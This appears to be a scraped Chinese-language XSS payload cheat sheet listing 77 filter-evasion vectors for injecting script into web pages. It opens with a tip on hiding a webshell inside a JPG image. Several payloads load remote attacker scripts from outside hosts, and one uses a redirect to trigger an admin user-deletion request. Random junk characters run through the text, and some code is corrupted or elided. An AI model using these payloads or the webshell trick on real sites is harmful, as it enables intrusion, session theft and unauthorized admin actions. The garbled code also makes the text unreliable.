跨站图片shell7 F5 a, ?3 f. q5 N. {
XSS跨站代码 <script>alert("")</script>
' P; Q7 H j, g( p9 }; k. J1 ]& ~# L$ T5 {6 u2 K) v& C. a2 m
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
0 r4 b6 a1 ~9 G7 @& X+ D$ G# q" _! _2 K- \; f. w: l+ b7 s/ y
4 J. G2 [8 X$ u! D1 F% ]+ }& z
" N) o1 {% d8 k! G$ t0 l% g
1)普通的XSS JavaScript注入
9 B2 |: u) ^' I<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>. o6 s$ n- @' ~6 ]- @
# @% U% C; Y1 |2 s(2)IMG标签XSS使用JavaScript命令
, `- ?4 c( O7 i- w. ]8 ^<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 F4 v6 c: B/ q
+ v8 i8 c# [1 E9 |* L, ~(3)IMG标签无分号无引号
. P) v4 I! v$ m6 Z<IMG SRC=javascript:alert(‘XSS’)>
: Z1 e4 Q+ B2 @+ M% D0 e7 M, @ Q( T0 Y u0 e+ \1 H* X* R7 J
(4)IMG标签大小写不敏感8 v1 X, A9 g; y {' c
<IMG SRC=JaVaScRiPt:alert(‘XSS’)> Q- l0 r4 N. G4 G- m) ]* Q
" Y9 n; J/ i" w7 o4 T" s8 o
(5)HTML编码(必须有分号)
/ G8 v$ ~% t) Q/ F; r/ u5 i<IMG SRC=javascript:alert(“XSS”)>
+ `% p, J$ J+ S3 _3 f( W6 p( N' ]
8 _8 p- J" U7 O; V(6)修正缺陷IMG标签
5 [" t! B1 L: K. a F8 _<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”># c# P$ N2 U5 S! ~" K
6 [# ]4 f3 p5 W* a7 h6 J3 N(7)formCharCode标签(计算器)
" k1 F: O8 X( u<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
0 \- y8 q6 |8 L+ m- q4 d3 t! {2 @0 ~% c
(8)UTF-8的Unicode编码(计算器)( p: P" O) U5 R1 X
<IMG SRC=jav..省略..S')>/ Z1 t. @$ R7 O# _, F6 E( P0 p
* T5 ? H- _/ q/ N) M(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
; r+ Y+ i. G3 G8 y<IMG SRC=jav..省略..S')>
9 l8 x9 w9 f0 y; R! j; F& B4 o) v7 Z( A
(10)十六进制编码也是没有分号(计算器)
' O" @, W% y# E K5 G<IMG SRC=java..省略..XSS')>; ~# E# V! i7 L/ u# }0 ~
6 B# A* s( u s. L3 u5 x* G
(11)嵌入式标签,将Javascript分开: K5 [4 r0 n- d7 i2 M
<IMG SRC=”jav ascript:alert(‘XSS’);”>
! O; q# b5 ]' M1 @+ o/ d( ?. L' d! V) U% i
(12)嵌入式编码标签,将Javascript分开
% N9 H. M8 P: ?# n5 I0 k<IMG SRC=”jav ascript:alert(‘XSS’);”>/ M( [& N2 O9 d B4 K& r
" A6 Y) R Q. E( f
(13)嵌入式换行符; W6 ?$ ?' z; k& t
<IMG SRC=”jav ascript:alert(‘XSS’);”>
! B9 K8 Y* }) J g3 Z8 ^6 M0 l! D# r7 x: X* B
! ?& U& X, e* k(14)嵌入式回车
% p# G/ Z! ~0 h% W1 l* V<IMG SRC=”jav ascript:alert(‘XSS’);”>
, k( v( G, b! |6 [5 Z: U- H2 B
/ m) ?+ i7 W6 b* C(15)嵌入式多行注入JavaScript,这是XSS极端的例子* ]* S, B5 z# D8 f
<IMG SRC=”javascript:alert(‘XSS‘)”>7 g$ M: O, `3 H( Y- J# ?; x7 K) d
5 v' z% y7 U8 z: m
(16)解决限制字符(要求同页面)9 w- i3 h% G8 a2 ~8 v9 N
<script>z=’document.’</script>
/ B! v+ e; p" b" p$ t% f<script>z=z+’write(“‘</script>
1 |7 @: b& r P( h<script>z=z+’<script’</script>
; r: t5 L) P' D% G<script>z=z+’ src=ht’</script>
5 _. C+ E4 {! V, A- h# s<script>z=z+’tp://ww’</script>
* L+ q) `* I5 G0 y7 K9 K+ [1 F<script>z=z+’w.shell’</script>7 A, H$ j) p' o8 c9 C& q& B
<script>z=z+’.net/1.’</script># k; I) k4 I P5 m$ k/ b
<script>z=z+’js></sc’</script>
6 j( E+ {' |, Y: J2 N<script>z=z+’ript>”)’</script>( J9 Z1 r$ B. D( t9 F
<script>eval_r(z)</script>
+ L6 W) x7 }* P" E
4 A, W6 a7 o$ r! U/ [% M(17)空字符% N+ K% H |% {# z& b) ~+ u
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
" C8 j! e" W# `+ J7 ^- c# y( V& _3 A @
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用6 `" p" N. \1 R0 U& s) [
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
/ B( j0 u' [- c, \$ Z0 Q8 I- f) S/ l
(19)Spaces和meta前的IMG标签0 S& }% _5 K- o3 i
<IMG SRC=” javascript:alert(‘XSS’);”>
! _# c1 w) Y$ [* `" y( ?' R. F$ U1 s( W$ E I8 s/ k
(20)Non-alpha-non-digit XSS
6 q; S4 A: A! S7 e9 @+ @! ^<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
, ?, ^* G$ V2 |" _3 ~5 v2 S4 p1 I6 }6 S0 b
(21)Non-alpha-non-digit XSS to 2& X3 W7 g" ^1 B9 H) ?
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
& w5 d. W$ `$ ^( R/ ]& y q. U
: c* i/ s* q1 A5 f(22)Non-alpha-non-digit XSS to 3
6 d7 V4 p, E) S3 b, p* D, D! P<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
" j `! ?9 h0 Z. {- T- W: ]0 q- T" G2 [" N9 S" ~
(23)双开括号4 {: W& g) k4 B; F
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
" }% @6 s8 B, k- @' v" v6 _% j2 ^7 f6 }# J) W) t9 o, N2 k. x. ?$ f
(24)无结束脚本标记(仅火狐等浏览器)* v5 ]/ r4 A* y- R: \$ a
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>2 z6 M8 P* E0 J
) f5 r2 r ~) r
(25)无结束脚本标记2: e) S, Y2 V# ~: I/ F: O! h
<SCRIPT SRC=//3w.org/XSS/xss.js>; J5 `# C) u% H3 l7 y5 G9 h6 r
6 g& V' ]3 d; A3 j- a; Y
(26)半开的HTML/JavaScript XSS
- T0 E! m. Z1 N; i: q& g<IMG SRC=”javascript:alert(‘XSS’)”
0 p( }8 G" G, c% R
/ [9 i' e" V( d/ L" P$ V(27)双开角括号
& e" d7 f3 m# f0 b l# @! F! _<iframe src=http://3w.org/XSS.html <. Y$ w! \6 p. i
! G4 T0 H0 v$ n2 x(28)无单引号 双引号 分号# c7 P/ c* t& J$ b
<SCRIPT>a=/XSS/
, i/ `' C. [; t2 I5 E4 ualert(a.source)</SCRIPT>
! q1 ]2 I; s% X$ R+ t8 E0 @
9 t% `* p" i, @* r3 Y. O(29)换码过滤的JavaScript0 a. v$ x% n7 {$ S6 k
\”;alert(‘XSS’);//* E: ?4 H! n% N
* X, n5 L: A7 M4 M; l(30)结束Title标签- E7 F- H& b4 ?" Q8 d
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
: d1 D6 e3 O- {! I8 I- |
6 A1 H% p5 c$ b" K* [* E1 j8 H6 |(31)Input Image9 F* c( _" e) S; F3 Q. v, J/ O
<INPUT SRC=”javascript:alert(‘XSS’);”>9 H4 A" T# f$ b% z
3 a0 O7 y- \$ {/ m7 s* t. d0 s
(32)BODY Image
8 T7 I5 l" D8 e1 a, v/ r3 S3 i$ v# w- w3 ]<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
* @5 w& V7 W$ |! h2 w" \% o2 X9 ^% @0 q3 ~" s# g0 {
(33)BODY标签
, Q9 C. y+ J+ l7 F<BODY(‘XSS’)>
g2 h* ?5 b3 t j# M" o" @- |) H9 _0 [6 M0 {
(34)IMG Dynsrc
6 P3 r8 E, _* A7 |0 ?6 K, Z# A<IMG DYNSRC=”javascript:alert(‘XSS’)”>- v" S1 S% ~' U. Z" U! T0 [1 F4 a1 c
' E+ m) x% F) _, p4 Y2 |; w% ]
(35)IMG Lowsrc
5 p9 L$ B1 M X5 U. v3 u<IMG LOWSRC=”javascript:alert(‘XSS’)”>; C3 E+ H, g% X0 v9 j* u% S7 h+ Y0 [; T
' v+ _8 Z3 \0 z8 P# l+ `- M/ N(36)BGSOUND6 o- Z, E- Y: k: x+ R
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
; v/ Q" i) c( k3 }: L
1 ~9 _5 u; @$ ~(37)STYLE sheet: m+ \; O$ j: N1 x+ `3 K b
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>1 V. e2 ]* r3 |
* ]3 A. b0 j% g- B% E
(38)远程样式表
7 y9 E' b2 d. K<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>2 o* |7 O1 L3 _/ F' i$ p6 K; G& h+ L
y6 _, Q2 x. I# ?! _7 M: D(39)List-style-image(列表式)) h# F( [3 O# m+ n4 P" A3 `
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
; h. ?, s. b6 U) c/ u B. q4 F( V: L" W& F8 D8 G0 k- n& C
(40)IMG VBscript' x; D3 j* a. `3 ]0 A _
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS& ^/ S) `; E; Q0 e3 ~7 i
* Q' X/ I" A( s(41)META链接url2 S! t* ` X2 T1 W$ ^, _
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>6 C( T0 ~- R3 v- A2 ]
( }1 O! I6 N6 m7 P(42)Iframe: E! E2 X7 w! V) B; a6 a
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
1 r7 n+ Z( J p(43)Frame
; F9 Z, c. t, [1 `. A. l<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>7 \% e: v0 w! X# Q! _; i
$ x6 Z0 {/ i& d$ ]2 e5 o
(44)Table' g* K5 a8 b. a
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>( ~, A' r4 i% p' X4 f0 R
1 ^% R/ ~6 B; K" i1 d, A+ }) ~
(45)TD" h( A7 }: U1 G, u0 N3 w9 {
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>, ?. ^, n, ?4 i$ n/ T" W7 [
" p) q5 m: t! @; v1 ~& E+ N5 E(46)DIV background-image" n$ S" l |9 [- l) d9 E: c
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>7 L7 J& w0 i! T* e/ L7 q9 \, K2 M
; f6 Z5 {! _3 v; |
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)- \+ {4 m3 r1 d) z
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>* v& I% ], ?5 F+ W
- k% ^9 F% y0 j- O7 @(48)DIV expression
' @' Z3 u8 r. h<DIV STYLE=”width: expression_r(alert(‘XSS’));”>4 Z( }' {' K: F4 J* z8 L* C+ M* ~
G! G! S; e- V( Q. l(49)STYLE属性分拆表达
/ p8 D' u- I! q: N8 H+ g<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
. N [$ ?7 t& q% o% M0 r
! j2 c/ s* Z# X5 W(50)匿名STYLE(组成:开角号和一个字母开头)
- J" b# ]! a2 \) F3 I<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
7 _4 z# e, B, i( M! X5 ` A
* V C e, k* N$ O z% J. ^" \5 v(51)STYLE background-image5 ]* l) W& V5 w1 q/ [5 ]. ^) g
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A> d" i0 C( N4 |8 z
# R4 R+ U0 t4 k6 N) K5 a(52)IMG STYLE方式$ @8 L) ]0 r8 C: V
exppression(alert(“XSS”))’>
' I; u! _5 J- d6 C) k
% k8 ?5 x p% u3 S(53)STYLE background
& t& u; o) E, G) c, R9 S<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ J. A7 f5 u: n% h4 ?* t* z* H
0 K8 C# M* D" P ?; ]+ @5 W9 }(54)BASE
' _4 x7 \& T, Q( I7 O: S) g<BASE HREF=”javascript:alert(‘XSS’);//”>& o, I; h# t B+ t& c8 O* i
% r% {, e. b, i$ i, c* X
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS5 X3 x5 d1 d( V5 g" n4 |
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
8 O# D6 \8 v# v
# ^$ d) ?, Q8 l* c( P( e. ]- Z/ T. k(56)在flash中使用ActionScrpt可以混进你XSS的代码
u" h! C, |5 ]% Ca=”get”;4 A8 D; a1 i) V- b. e' c5 t' \
b=”URL(\”";; [+ w. x, h3 e, N, G
c=”javascript:”;+ S, g4 T. I# r, r2 h# l7 f
d=”alert(‘XSS’);\”)”;4 b0 J4 _6 k' r/ j8 e. T- J4 s
eval_r(a+b+c+d);3 B( C' g# C8 \! B* V
; ^; L ]( R7 x" y5 ]5 a2 l( [8 a3 a
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上' a5 L& e0 q! ~- a3 Y8 r0 z
<HTML xmlns:xss>
% w9 E% s3 h* n8 t# E* ~<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
8 _: H$ o' s. C* o<xss:xss>XSS</xss:xss>/ F L8 ?% i. ^( A
</HTML>
4 `9 @1 @- e, @6 O& s2 |8 F @- i _, O1 h! |
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用. t! {7 T8 b; o& z5 J" V/ {6 }
<SCRIPT SRC=””></SCRIPT>* F- N% l$ R% j- Z7 T
2 V$ V: W7 z$ Q
(59)IMG嵌入式命令,可执行任意命令
; a* r. t0 u6 V; i% k<IMG SRC=”http://www.XXX.com/a.php?a=b”>* Q6 D# I& M2 B; A% y0 S
9 Q: d; S' p- Q! C9 E& W3 q(60)IMG嵌入式命令(a.jpg在同服务器)
' {3 D. t( n2 P( F3 R9 |& nRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
; e7 o+ x9 M' m* P3 G& q7 X* s6 {2 ?- z" P: s) N* F2 V
(61)绕符号过滤
6 }2 g1 T$ q, e% T<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 y0 J) b! ^, o* Z
5 s" }. }. P& F. y5 [% z(62)
% m7 f W) G, ^' [<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
% P* f( N! I2 A
7 \6 O: g5 @3 e0 o, T) {(63)
* A* @' V Y9 f# Y<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>% G* j. v' m' \3 ^! l4 G8 g- k
, X, d2 |, ^" ?
(64)" z* w* E' C! |0 n
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>: h9 |5 o. P. U) k
9 V5 y1 I& ?% `; q
(65)
( M: ^3 d% Z/ ^/ e; |2 j) {* c<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
& X: \4 e0 j: B* {9 t* c( t
3 [1 q0 v' a4 G' O6 ^(66)
$ G+ @6 B+ k( S" v<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>; O- V H' [: w6 P3 z O) ?3 @5 P3 _
$ S$ x5 m7 ^, g" {# A# v1 B
(67)
. h4 d/ {( p7 S* _<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
7 x% A. R- n/ G$ h' x
, N% S( `, x' n1 ?/ F' q(68)URL绕行$ }0 |0 R ^! L$ ]- B/ l
<A HREF=”http://127.0.0.1/”>XSS</A>
+ X9 A4 A/ F) c& m
% [, _0 l3 w% S+ b* c(69)URL编码- V8 @3 m1 u2 n! r' r
<A HREF=”http://3w.org”>XSS</A>
/ Z5 W1 Y8 \' J+ J8 m3 O7 G
8 i {, H) F. H) O! t s(70)IP十进制3 ]+ ?2 {, T( A0 U0 }2 @
<A HREF=”http://3232235521″>XSS</A>
- }* t5 U7 W" _: Y9 \4 W8 |
# D3 p( g& _+ B2 I; Z. U(71)IP十六进制
1 D5 u& `3 D/ j4 M# F+ [6 X! ~<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
4 M/ w9 W5 V% ]9 k
/ g- i/ }7 X% U4 i9 q2 L/ P" @(72)IP八进制5 X& ^- s/ a# S! `
<A HREF=”http://0300.0250.0000.0001″>XSS</A>9 k- i3 o/ Q4 k" b
! c3 ^/ s4 M. d' M+ Z(73)混合编码
9 F+ i6 W3 z4 w# Q& m7 \<A HREF=”h
* x* ^% i/ ?2 G8 {tt p://6 6.000146.0×7.147/”">XSS</A>
; d, W% S8 E9 q: b& ~- Z- C2 O4 ~& L7 c+ f( q2 o8 a% Q
(74)节省[http:], [) Z8 Q8 Q; R4 h
<A HREF=”//www.google.com/”>XSS</A>6 D, v8 `; I; p# n) d* o
0 s" ?4 m" k7 P$ Y0 N* T(75)节省[www] s, k; Q. I5 y3 `* u9 I' ~
<A HREF=”http://google.com/”>XSS</A>
2 ?' V6 b7 z5 j4 @$ C! l# \" T. }% `4 \% w
(76)绝对点绝对DNS
- ^: p( S2 {' Y0 M9 R<A HREF=”http://www.google.com./”>XSS</A>1 ~ Y; V; `4 u
2 {8 E2 X" N- _; X1 F1 N
(77)javascript链接
+ E5 ?% k& w% A8 ~<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
8 r! j# N2 P' F2 Y |